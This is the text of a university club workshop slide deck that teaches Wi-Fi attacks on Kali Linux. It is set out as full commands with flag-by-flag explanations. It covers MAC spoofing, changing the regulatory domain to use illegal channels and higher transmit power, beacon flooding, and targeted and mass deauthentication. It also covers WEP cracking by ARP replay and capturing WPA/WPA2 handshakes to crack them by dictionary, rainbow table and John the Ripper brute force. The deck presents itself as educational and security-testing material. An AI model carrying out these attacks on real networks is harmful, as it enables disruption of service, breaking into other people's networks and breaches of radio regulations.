Post on 22-Feb-2016
description
ACM Wi-Fi Workshop
Presented By:Chris Rawlings
Brad Emge
Disclaimer
• By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored.
• Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits.
• The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.
Information
• All steps in this slide show were performed and tested on 32-bit kali linux version 1.0.6 with an Alfa AWUSO36H USB wireless card(these are the operating system and wireless card you have in front of you).
• Any statement that beings with ‘#’ is a command to be typed in the terminal
What is Kali Linux
• Debian based Linux operating system
• Designed for the sole purpose of penetration testing, exploitation, and hacking
Booting into Kali Linux
• Start with computer off• Plug in flash drive and USB wireless
card• Boot the computer off of the USB flash
drive• From YUMI select system tools then
kali• Select live (686-pae) from the boot
menu
Post Kali Boot
• Make sure that your computer is not in “airplane” mode– Click applicationssystem
toolspreferencessystem settingsnetwork
– Make sure airplane mode is off– Close that window
Temporarily Connecting to The Internet
• Click the network icon in the upper right– Looks like two computers with a red
circle and a X• Select the MST-PSK-N network• Make sure you are connecting with
the non-realtek wireless adapter• Enter the password “JoeMiner”
Getting Necessary Files
• Open the terminal• Type #wget
http://tinyurl.com/acmwifiworkshopfiles
• Open root under the places menu• Unzip the file and make sure the
files are all in the root folder
Terms and Definitions
• Access Point(AP)• Bandwidth• Channel• Evil Twin• Frequency• Honeypot• IEEE 802.11
Terms and Definitions
• IP Address• ISM Band• MAC Address• Modes of Wi-fi• NIC• Packet
Terms and Definitions
• Rainbow Table• WEP• Wi-Fi• WPA• WPA2• WPS
FINDING THE CORRECT WIRELESS CARD
Open the terminal
Type #airmon-ng
FINDING YOUR MAC ADDRESS
Type #ifconfig wlan1
• ifconfig– program we are using
• wlan1– interface we want information on
#ifconfig wlan1
CHANGING YOUR MAC ADDRESS
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
#ifconfig wlan1 down
Type #macchanger –m de:ad:be:ef:c0:fe wlan1
• macchanger– program we are using
• -m– manually set the MAC address
• de:ed:be:ef:c0:fe– MAC address of your choice
• wlan1– interface we are changing the MAC of
#macchanger –m de:ad:be:ef:c0:fe wlan1
Type #ifconfig wlan1 up
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– enable the interface
#ifconfig wlan1 up
Type #ifconfig wlan1
• ifconfig– program we are using
• wlan1– interface we are interested in
#ifconfig wlan1
RANDOMLY CHANGING YOUR MAC ADDRESS
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
#ifconfig wlan1 down
Type #macchanger –r wlan1
• macchanger– program we are using
• -r – random MAC address
• wlan1– interface we are operating on
#macchanger –r wlan1
Type #ifconfig wlan1 up
• ifconfig– program we are using
• wlan1– interface we are interested in
• up– enable the interface
#ifconfig wlan1 up
Type #ifconfig wlan1
• ifconfig– the program we are using
• wlan1– the interface we are interested in
#ifconfig wlan1
CHANGING YOUR MAC ADDRESS BACK TO IT’S FACTORY SETTING
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
#ifconfig wlan1 down
Type #macchanger –p wlan1
• macchanger– the program we are using
• -p– changes the MAC back to factory
settings• wlan1
– the interface we are operating on
#macchanger –p wlan1
Type #ifconfig wlan1 up
• ifconfig– program we are using
• wlan1– interface we are interested in
• up– enable the interface
#ifconfig wlan1 up
Type #ifconfig wlan1
• ifconfig– the program we are using
• wlan1– the interface we are interested in
#ifconfig wlan1
CHANGING THE CHANNEL OF YOUR WIRELESS CARD
type #iwconfig wlan1
• iwconfig– program we are using
• wlan1 – interface we are interested in
#iwconfig wlan1
type #iwconfig wlan1 channel c
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows you to change the channel
• c– specific channel you wish to use
1,2,3…
#iwconfig wlan1 channel c
type #iwconfig wlan1
• iwconfig– program we are using
• wlan1 – interface we are interested in
#iwconfig wlan1
OPERATING OUTSIDE OF US REGULATION FREQUENCIES
type #iw reg get
• iw– program we are using
• reg– short for regulation
• get– show the iw regulation settings
#iw reg get
type #iw reg set JP
• iw– program we are using
• reg– short for regulation
• set– allows us to set the country regulation
• JP– country code for japan
• allows us to operate on channels 12,13,&14
#iw reg set JP
type #iw reg get
• iw– program we are using
• reg– short for regulation
• get– show the iw regulation settings
#iw reg get
Type #iwconfig wlan1 channel 14
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows us to set the channel
• 14– channel we are setting
#iwconfig wlan1 channel 14
Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1– interface we are interested in
#iwconfig wlan1
CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY
type #iwconfig wlan1 channel c
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows you to change the channel
• c– specific channel you wish to use
1,2,3…
#iwconfig wlan1 channel c
OPERATING YOUR WIRELESS CARD WITH MORE POWER
Type #iwconfig wlan1
• iwconfig– program we are using
• wlan1– interface we are operating on
#iwconfig wlan1
Type #iw reg set BO
• iw– program we are using
• reg– short for regulation
• set– allows us to set the country regulation
• BO– country code for Bolivia
#iw reg set BO
Type #iwconfig wlan1 txpower 30
• iwconfig– program we are using
• wlan1 – interface we are operating on
• txpower– stands for transmit power
• 30– power output in dBm
#iwconfig wlan1 txpower 30
Type #iwconfig wlan1
• iwconfig– program we are using
• wlan1– interface we are operating on
#iwconfig wlan1
Note on Transmit Power
• The power output has increased from .1 Watt to 1 Watt
• With our current equipment(Wi-Fi card and antenna) we will not be violating FCC regulation, however with a higher gain antenna we could be
FINDING THE MODES YOUR WIRELESS CARDS SUPPORTS
Type #airmon-ng
• airmon-ng– program we are using
#airmon-ng
Type #iw phy phy0 info|grep –A3 modes
• iw– program we are using
• phy– search based upon physical device number
• phy0– physical device number from airmon-ng
• info– give us the info about the phy0 device
• | grep– pipes the output into the program grep
• -A3– indicates to output 3 lines are the given search term
• modes– the term we are searching for with grep
#iw phy phy0 info|grep –A3 modes
Modes Supported
• IBSS– ad-hoc mode– computer to computer connection
• managed– allows you to connect to networks– your Wi-Fi card is usually in managed mode
• monitor– promiscuous mode– allows you to view traffic not destined to your card
OPERATING YOUR CARD IN AD-HOC MODE
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
#ifconfig wlan1 down
Type #iwconfig wlan1 mode ad-hoc
• iwconfig– program we are using
• wlan1– interface we are operating on
• mode– allows us to set a specific mode
• ad-hoc– the mode we will be using
#iwconfig wlan1 mode ad-hoc
Type #iwconfig wlan1 channel 1
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows us to change the channel
• 1– specific channel we are using 1,2,3…
#iwconfig wlan1 channel 1
Type #iwconfig wlan1 essid ‘nameofnetwork’
• iwconfig– program we are using
• wlan1– interface we are operating on
• essid– allows us to set the network name
• ‘nameofnetwork’– name of the network
iwconfig wlan1 essid ‘nameofnetwork’
Type #iwconfig wlan1 key s:’password’
• iwconfig– program we are using
• wlan1– interface we are operating on
• key– allows us to operate a network with a WEP key– a WPA/WPA2 key is not possible(I think)
• s:– indicates the key entered is in ASCII
• ‘password’– the key as an ASCII String
#iwconfig wlan1 key s:’password’
Type #ifconfig wlan1 up
• ifconfig– program we are using
• wlan1– interface we are operating on
• up– enable the interface
#ifconfig wlan1 up
Type #iwconfig wlan1
• iwconfig– the program we are using
• wlan1– the interface we are operating on
#iwconfig wlan1
TURNING OFF AD-HOC MODE
type #iwconfig wlan1 mode managed
• iwconfig– program we are using
• wlan1– interface we are operating on
• mode– allows us to change the mode of the
adapter• managed
– sets managed mode
OPERATING YOUR CARD IN MONITOR MODE
type #airmon-ng start wlan1
• airmong-ng– program we are using
• start– enables monitor mode
• wlan1– interface we wish to enable monitor
mode on
#airmon-ng start wlan1
type #kill 3018 & kill 3853
• kill– command to stop programs from
running• 3018
– PID of process from slide before• &
– and, allows multiple commands in one line
#kill 3018 & kill 3853
type #iwconfig
• iwconfig– program we are using
#iwconfig
DATA GATHERING IN MONITOR MODE
type #tshark –i mon0
• tshark– program we are using– terminal wireshark
• -i– interface
• mon0– interface we are operating on
#tshark –i mon0
#tshark –i mon0
type ctrl-c
• crtl-c– stops the running program
type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we wish to view wireless
traffic on
#airodump-ng mon0
#airodump-ng mon0
#airodump-ng mon0
• BSSID– MAC address of access point
• station– MAC address of connected client
• Probe– shows what access points a station is
looking for
type ctrl-c
• crtl-c– stops the running program
BEACON FLOODING
What are Beacons
• Management Frame in IEEE 802.11(Wi-Fi)
• Transmitted to announce the presence of a network
• Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.
type #nano ssidlist
• nano– text editor I am using– you may use something else if you
prefer• ssidlist
– filename for the text file that will contain the SSIDS we will be broadcasting
#nano ssidlist
type different network names on separate lines
type ctrl-x, y, enter
• This saves the file in nano• you could also write out the file and
then exit• this may be different if you didn’t
use nano
type #mdk3 mon0 b –f ssidlist
• mdk3– program we are using
• mon0– interface we are operating on
• b– means to send out beacon frames
• ssidlist– text files with the network names in it
#mdk3 mon0 b –f ssidlist
#mdk3 mon0 b –f ssidlist
type ctrl-c to stop
• stops the running program
VIEWING PROBE REQUESTS
What are Probe Requests
• Management Frame in IEEE 802.11(Wi-Fi)
• A packet sent from a client(computer, phone, etc) to see if a network is within range
• Your devices are constantly sending out Probe Requests and we can view them(also exploit them, but that’s later)
type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are operating on
#airodump-ng mon0
• In a very dense Wi-Fi environment, we will be unable to see the probe requests at first
• to fix this– zoom out
• available from the view menu– stop the program with ctrl-c – zoom in
• available from the view menu
#airodump-ng mon0
PASSIVE NETWORK SCAN
Type #iw dev wlan1 scan passive | grep SSID
• iw– program we are using
• dev– indicates that we are identifying our Wi-Fi card by device number
and not physical number• wlan1
– interface we wish to scan on• passive
– indicates that no packets should be sent• | grep
– program that is used to search the output • SSID
– the word that grep will be searching for
#iw dev wlan1 scan passive | grep SSID
ACTIVE NETWORK SCAN
Type #iwlist wlan1 scan | grep ESSID
• iwlist– program we are using
• wlan1– interface we are scanning on
• scan– indicates we wish to scan
• |grep– program used to search the output of iwlist
• ESSID– the word we are searching for with grep
#iwlist wlan1 scan | grep ESSID
DEAUTHENTICATION
What is Deauthentication
• Management Frame in IEEE 802.11(Wi-Fi)
• Allows clients to be kicked off of a wireless access point
• These are naturally occurring in wireless traffic and users do not even recognize it
• We can send excessive amounts of these packets to prevent a client from connecting
DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
#airodump-ng mon0
#airodump-ng mon0
• type ctrl-c when you have finished finding your target
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0– interface we are changing the channel
of• channel
– indicates we are changing the channel• 11
– channel we are changing to
#iwconfig mon0 channel 11
Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this
• -0– indicates deauthentication packet
• 10– number of deauths to send
• -a 00:1a:c4:51:3c:31– access point MAC address
• -c d4:20:6d:41:78:b2– client MAC address
• mon0– interface to send deauth packets out on
#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c
d4:20:6d:41:78:b2 mon0
DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are using
#airodump-ng mon0
#airodump-ng mon0
• type ctrl-c when you have finished finding your target
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0– interface we are changing the channel
of• channel
– indicates we are changing the channel• 11
– channel we are changing to
#iwconfig mon0 channel 11
Type #nano blacklist
• nano– text editor we are using– you may use something else if you
prefer• blacklist
– name of the text file we are editing
#nano blacklist
#nano blacklist
#nano blacklist
• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point
• Type ctrl-x, y, enter– this saves the file
Type #mdk3 mon0 d –b blacklist –c 11
• mdk3– program we are using
• mon0– interface we are deauthenticating from
• d– indicates deauthentication packets are to be sent
• -b– indicates that we are using a blacklist. We are wanting to attack the indicated
access points• blacklist
– file that has the list of MAC addresses to deauth• -c
– indicates what channel to use• 11
– channel the access points are operating on
#mdk3 mon0 d –b blacklist –c 11
#mdk3 mon0 d –b blacklist –c 11
• type ctrl-c to stop the program
DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are using
#airodump-ng mon0
Type #nano blacklist
• nano– text editor we are using– you may use something else if you
prefer• blacklist
– name of the text file we are editing
#nano blacklist
#nano blacklist
#nano blacklist
• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point
• Type ctrl-x, y, enter– this saves the file
Type #mdk3 mon0 d –b blacklist –c 6,11
• mdk3– program we are using
• mon0– interface we are deauthenticating from
• d– indicates deauthentication packets are to be sent
• -b– indicates that we are using a blacklist. We are wanting to attack the indicated
access points• blacklist
– file that has the list of MAC addresses to deauth• -c
– indicates what channel to use• 6,11
– channels the access points are operating on
#mdk3 mon0 d –b blacklist –c 6,11
#mdk3 mon0 d –b blacklist –c 6,11
• type ctrl-c to stop the program
CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
#airodump-ng mon0
#airodump-ng mon0
• type ctrl-c when done finding the access point to wish for clients to connect to
Type #nano whitelist
• nano– text editor we are using– you may use something else if you
prefer• whitelist
– text file with the list of MAC addresses of the access points you want clients to be able to connect to
#nano whitelist
#nano whitelist
#nano whitelist
• note that it is possible to enter multiple MAC addresses in this file as well
• type ctrl-x, y, enter with finished
Type #mdk3 mon0 d –w whitelist
• mdk3– program we are using
• mon0– interface to send deauth packets from
• d– indicates to deauthenticate clients
• -w– indicates we are whitelisting specific access points
• whitelist– text file that contains the MAC address of the AP we want
clients to connect to– deauths all APs other than those on this list
#mdk3 mon0 d –w whitelist
#mdk3 mon0 d –w whitelist
• type ctrl-c when done sending deauth packets
BREAKING ENCRYPTION
BREAKING WEP ENCRYPTION
Breaking WEP Encryption
Breaking WEP Encryption
• Steps– Identify Network– Begin collecting data– cause extra data to be generated
• optional• will not want to be done if conducting a
passive attack– start cracking once the number of
Initialization Vectors(IVs) reaches 50,000
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
#airodump-ng mon0
#airodump-ng mon0
• Notice that in the ENC column it says WEP.
• Any WEP encrypted access point is vulnerable.
• type ctrl-c when you have finished finding your target
#airodump-ng mon0
#airodump-ng mon0
Breaking WEP Encryption
• open a new table in the terminal window
• filenew tab
Type #aireplay-ng --ignore-negative-one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– this may not be needed
• -1– Associates with the Access Point
• -a 12:18:0a:21:ae:e4– indicates MAC address of AP & MAC of the AP
• -h 00:c0:ca:75:6f:ab– sets source MAC address & MAC of our wireless card
• mon0– interface we are operating on
Type #aireplay-ng --ignore-negative-one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
Type #aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– this may not be needed
• -3– ARP Request Replay Attack– most effective way to generate new IVs
• -b 12:18:0a:21:ae:e4– indicates MAC address of AP & MAC of the AP
• -h 00:c0:ca:75:6f:ab– sets source MAC address & MAC of our wireless card
• mon0– interface we are operating on
#aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
Breaking WEP Encryption
• Go back to the first tab and wait until the number in the data column >50000
• This number is not set since the attack we are doing is based upon statistics.
• Sometimes you can break it with half as many and sometimes you need twice as many or more.
• The length of the key also contributes to the number of IVs that are needed
Breaking WEP Encryption
Breaking WEP Encryption
• Open a new tab in the terminal
Type #aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
• aircrack-ng– program we are using
• -b 12:18:0a:21:ae:e4– the MAC address of the target Access
Point• acm_wep-01.cap
– the file that contains the files captures with airodump-ng
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
• If you are not successful wait until the number captured increases to the suggested number and then try again
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
• If successful, you will see the image previous.
• Go back to the other two tabs and stop the running programs using ctrl-c
BREAKING WPA&WPA2 ENCRYPTION
Breaking WPA&WPA2 Encryption
• What makes WPA&WPA2 more difficult to break into?– larger key– does not use RC4– Used Network as well as password to
computer the key
Breaking WPA&WPA2 Encryption
• No short cut like in breaking WEP• Must brute force the key• Hope that it is a dictionary word or
something very simple such as ten numbers
• Three networks set up for breaking into– dictionary password– 8-char alpha-numeric– random
Breaking WPA&WPA2 Encryption
• Process– Begin listen to the packets on that
network– Capture 4-way handshake between
AP and client• this can be done passively or by
deauthentication – take that captured handshake and try
different sources of passwords to break it
– wait and see
BREAKING WPA WITH A DICTIONARY LIST
Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are using to listen on
#airodump-ng mon0
#airodump-ng mon0
• After finding the target network type ctrl-c to stop running the program
Type #airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
• airodump-ng– program we are using
• -c 11– says to listen on channel 11
• --bssid 00:1a:c4:51:3c:31– listen for traffic to and from this Access point
• --w acm_dictionary– file to save the data to
• mon0– interface we are listening on
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
• The previous image shows connected clients to the specific access point
• At this point you could wait for the handshake to occur or you could force it to occur by means of deauth
Breaking WPA&WPA2 encryption
• Open a new tab in terminal• This can be done by going to
filenew tab
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0 – interface we are operating on
• channel– allows us to change the channel
• 11– specific channel we are changing the
interface to
#iwconfig mon0 channel 11
Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this
• -0– indicates deauthentication packet
• 10– number of deauths to send
• -a 00:1a:c4:51:3c:31– access point MAC address
• -c d4:20:6d:41:78:b2– client MAC address
• mon0– interface to send deauth packets out on
#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
Breaking WPA&WPA2 encryption
• Go back to the first tab and you should see an image similar to the following
• The WPA handshake in the top must be there to proceed
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
Breaking WPA&WPA2 encryption
• Make sure the dictionary files that you downloaded earlier are in the same folder as your .cap files.
• This should be in the root directory• We will be demonstrating using the
english.txt file, however feel free to experiment with the others
Type #aircrack-ng acm_dictionary-01.cap –w english.txt
• aircrack-ng– program we are using to crack the key
• acm_dictionary-01.cap– network capture file with the
handshake in it• -w
– indicates that a word list is to be used• english.txt
– the file name containing the wordlist
#aircrack-ng acm_dictionary-01.cap –w english.txt
#aircrack-ng acm_dictionary-01.cap –w english.txt
• If not successful that means that the password was not in that list of words
• You could try using a larger word list or begin brute forcing to break the password
• If successful you should see the following
#aircrack-ng acm_dictionary-01.cap –w english.txt
BREAKING WPA&WPA2 USING A RAINBOW TABLE
What is a Rainbow Table
• pre-computed table of hashed value• they are built for a specific SSID(network
name)• built using a dictionary or some other source of
passwords• Takes a long time to compute and is a very
large file– Usually done on a very powerful computer
• The rainbow can then be used to quickly find a password
Breaking WPA&WPA2 using a Rainbow Table
• Because we already have the handshake, we do not need to re-capture it.
• We will be using the same .cap file as the previous example
Breaking WPA&WPA2 encryption
• Make sure the rainbow table that you downloaded earlier is in the same folder as your .cap files.
• This should be in the root directory• We will be demonstrating using the
acm_dictionary_hash file• This file was created from the
english.txt dictionary file specifically for this SSID
Type #cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –s
acm_dictionary• cowpatty– program we are using
• -r acm_dictionary-01.cap– the file that has the four way handshake in it
• -d acm_dictionary_hash– the file that is the pre-computed hashed for
this specific SSID• -s acm_dictionary
– telling cowpatty what the name of the network is
#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –
s acm_dictionary
#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –
s acm_dictionary• If the password was not in the
source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password
• If successful, you will see the following image
#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –
s acm_dictionary
COMPUTING A PERSONALIZED RAINBOW TABLE
Computing a personalized rainbow table
• As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc
• This is also used when you know the network name in advance and wish to prepare for the attack on the network
Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are using to listen on
#airodump-ng mon0
#airodump-ng mon0
• After finding the target network type ctrl-c to stop running the program
Type #genpmk –f english.txt –d acm_dictionary_hash –s
acm_dictionary• genpmk
– the program we are using• -f english.txt
– the file serving as the source of passwords• -d acm_dictionary_hash
– what the rainbow table should be saved as• -s acm_dictionary
– telling genpmk what the SSID is so that it can be hashed appropriately
#genpmk –f english.txt –d acm_dictionary_hash –s
acm_dictionary
#genpmk –f english.txt –d acm_dictionary_hash –s
acm_dictionary
BRUTE FORCING A PASSWORD
Brute forcing a password
• This is the most time consuming method although is guaranteed to eventually find the password
Brute forcing a password
• As you already have the four way hand shake, we will be moving right into the cracking portion of this example
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w –
acm_dictioanry-01.cap• john
– program we using. short for john the ripper• -stdout
– directs standard out to aircrack-ng• -incremental:all
– will increment through all possible passwords• | aircrack-ng
– second program we are running with the input being supplied by john the ripper
• -b 00:1a:c4:51:3c:31– tells aircrack-ng which access point to attack
• -w –– this is where the standard output of john the ripper is going
• acm_dictionary-01.cap– the file containing the four way handshake to be brute forced
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap
Type #john –stdout –incremental:all | aircrack-ng –b 00:1a:c4:51:3c:31 –w – acm_dictioanry-01.cap
Brute forcing a password
• The previous slide shows John the Ripper and aircrack-ng being used together
• There are ways to cut down on the number of possible passwords, for example– if you know the password is 14 characters, you
can have john skip passwords less than and greater than 14 characters.
• This is the longest way to crack a password but also a guaranteed way to do it